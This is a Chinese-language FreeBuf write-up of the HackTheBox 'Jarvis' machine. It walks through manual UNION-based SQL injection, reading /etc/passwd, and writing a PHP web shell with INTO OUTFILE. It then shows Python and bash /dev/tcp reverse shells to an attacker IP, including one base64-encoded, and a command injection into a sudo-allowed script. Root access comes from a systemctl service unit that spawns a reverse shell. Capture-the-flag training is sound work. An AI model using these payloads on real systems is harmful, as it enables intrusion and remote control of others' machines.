freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕过+TRP00F自动化权限提升+Systemctl 权限提升
[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕过+TRP00F自动化权限提升+Systemctl 权限提升
maptnh 2024-08-10 20:54:54 51510

信息收集

IP AddressOpening Ports
10.10.10.143TCP:22,80,64999

$ nmap -p- 10.10.10.143 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Stark Hotel
|_http-server-header: Apache/2.4.25 (Debian)
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & Web Reverse Shell

http://10.10.10.143

image.png

http://10.10.10.143/room.php?cod=1

image-1.png

不幸的是,如果你尝试使用sqlmap自动注入则会被封禁IP

image-2.png

字段数量为7个

$ curl -s 'http://10.10.10.143/room.php?cod=1%20order%20by%207--+' | wc -c

image-3.png

http://10.10.10.143/room.php?cod=-1%20union%20select%201,2,3,4,5,6,7--+

image-4.png

http://10.10.10.143/room.php?cod=-1%20union%20select%201,GROUP_CONCAT(DISTINCT%20%20table_name),3,4,5,6,7%20FROM%20information_schema.columns--+

image-5.png

Table
room
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_CACHES
KEY_COLUMN_USAGE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
INNODB_SYS_DATAFILES
TABLE_STATISTICS
INNODB_SYS_TABLESTATS
USER_STATISTICS
INNODB_SYS_INDEXES
XTRADB_RSEG
INNODB_CMP_PER_INDEX
INNODB_TRX
CHANGED_PAGE_BITMAPS
INNODB_FT_BEING_DELETED
INNODB_LOCK_WAITS
INNODB_LOCKS
INNODB_TABLESPACES_ENCRYPTION
XTRADB_INTERNAL_HASH_TABLES
INNODB_SYS_FIELDS
INNODB_CMPMEM_RESET
INNODB_CMP
INNODB_FT_INDEX_TABLE
INNODB_SYS_TABLESPACES
INNODB_MUTEXES
INNODB_BUFFER_PAGE_LRU
INNODB_SYS_FOREIGN_COLS
INNODB_CMP_RESET
INNODB_BUFFER_POOL_STATS
INNODB_FT

http://10.10.10.143/room.php?cod=-1%20union%20select%201,LOAD_FILE(%27/etc/passwd%27),3,4,5,6,7--+

image-6.png

得知www-data的工作目录在/var/www/

http://10.10.10.143/room.php?cod=-1%20union%20select%201,%27%3C?php%20system($_GET[1]);phpinfo();?%3E%27,3,4,5,6,7%20INTO%20OUTFILE%20%27/var/www/html/reverse.php%27--+

image-7.png

$ curl 'http://10.10.10.143/reverse.php?1=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'

image-8.png

www-data to pepper

$ sudo -l

image-9.png

我们可以使用pepper用户身份执行simpler.py文件

image-10.png

$ echo '$(cat /etc/passwd)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

image-11.png

$ echo 'L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNi4yNC8xMDAzNSAwPiYxIgo='|base64 -d >/tmp/rev.sh;chmod +x /tmp/rev.sh

$ echo '$(/tmp/rev.sh)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

image-12.png

User.txt

2354b15a6cb7ae36bfd2cb72f7b69b0d

权限提升

TRP00F自动化权限提升

image-14.png

Systemctl 权限提升

pwn.service

[Service]
Type=oneshot
ExecStart=/bin/bash -c '/bin/bash -i >&/dev/tcp/{re_ip}/{re_port} 0>&1'
[Install]
WantedBy=multi-user.target

$ systemctl link /tmp/pwn.service

$ systemctl start pwn.service

Root.txt

9d8eb89d70c481256f008375359affec

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
[Meachines] [Easy] Buff Gym-CMS-RCE+Chisel端口转发+CloudMe云文件存储-缓冲区溢出权限提升 原创
[Meachines] [Easy] Buff Gym-CMS-RCE+Chisel端口转发+CloudMe云文件存储-缓冲区溢出权限提升

Web安全

#Gym-CMS-RCE #Chisel端口转发 #CloudMe云文件存储-缓冲区溢出权限提升

maptnh

35503围观  · 1收藏 2024-08-21

[Meachines] [Easy] Devel FTP匿名访问文件上传+MS10-015权限提升 原创
[Meachines] [Easy] Devel FTP匿名访问文件上传+MS10-015权限提升

Web安全

#FTP #Kitrap0d #MS10-015

maptnh

37171围观 2024-08-21

LavaDome:一款基于ShadowDOM的DOM树安全隔离与封装工具
LavaDome:一款基于ShadowDOM的DOM树安全隔离与封装工具

工具

LavaDome是一款针对HTML代码安全和Web安全的强大工具,该工具基于ShadowDOM实现其功能,可以实现安全的DOM节点/树隔离和...

Alpha_h4ck

73227围观  · 2收藏 2024-08-20

如何使用WebSafeCompiler进行网站优化和知识产权保护
如何使用WebSafeCompiler进行网站优化和知识产权保护

工具

WebSafeCompiler是一款功能强大的Web安全与优化工具,该工具基于Node.js开发,可以帮助编译静态网站以进行优化或知识产权保...

Alpha_h4ck

63562围观  · 3收藏 2024-08-20

深度探讨隐藏在你代码中的漏洞:变异型跨站脚本(mXSS)
深度探讨隐藏在你代码中的漏洞:变异型跨站脚本(mXSS)

基础安全

本文深入探讨了与mXSS相关的技术内容,并给出了成因和技术缓解方案。

FreddyLu666

145980围观  · 5收藏 2024-08-20

maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 344 文章数
  • 65 关注者
[CISSP] [9] 安全漏洞,威胁和对策
2025-04-09
[CISSP] [8] 安全模型,设计和能力的原则
2025-04-09
[CISSP] [7] PKI和密码应用
2025-04-03
文章目录
User.txt
    TRP00F自动化权限提升
      Systemctl 权限提升
        Root.txt